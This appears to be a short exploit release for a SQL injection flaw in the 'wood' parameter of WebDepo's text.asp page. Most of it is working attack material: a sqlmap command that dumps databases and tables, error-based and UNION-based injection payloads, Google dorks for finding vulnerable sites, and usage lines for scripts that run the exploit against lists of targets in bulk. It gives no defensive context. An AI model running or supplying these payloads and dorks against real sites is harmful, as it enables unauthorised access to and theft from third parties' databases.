googleinurl / -0DAY-WebDepo--SQL-injection-INURL-BRASIL

  # AUTOR:        Cleiton Pinheiro / Nick: googleINURL
  # Blog:         http://blog.inurl.com.br
  # Twitter:      https://twitter.com/googleinurl
  # Fanpage:      https://fb.com/InurlBrasil
  # Pastebin      http://pastebin.com/u/Googleinurl
  # GIT:          https://github.com/googleinurl
  # PSS:          http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:      http://youtube.com/c/INURLBrasil
  # PLUS:         http://google.com/+INURLBrasil

python {$params['folder']} -u '{$params['target']}/text.asp?wood=1' -p wood --batch --dbms=MySQL {$params['proxy']} --random-agent --answers='follow=N' --dbs --tables

GET VULN:     wood=(id)
$wood=intval($_REQUEST['wood'])
Ex: http://target.us/text.asp?wood=1

Exploit:  +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
http://target.us/text.asp?wood=(id)+Exploit

Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
http://target.us/text.asp?wood=(id)+Exploit

inurl:"text.asp?wood="
site:il inurl:"text.asp?wood="
site:com inurl:"text.asp?wood="

   -t : SET TARGET.
   -f : SET FILE TARGETS.
   -p : SET PROXY
   Execute:
                 php WebDepoxpl.php -t target
                 php WebDepoxpl.php -f targets.txt
                 php WebDepoxpl.php -t target -p 'http://localhost:9090'

./inurlbr.php --dork 'inurl:text.asp?wood=' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --comand-vul "php WebDepoxpl.php -t '_TARGET_'"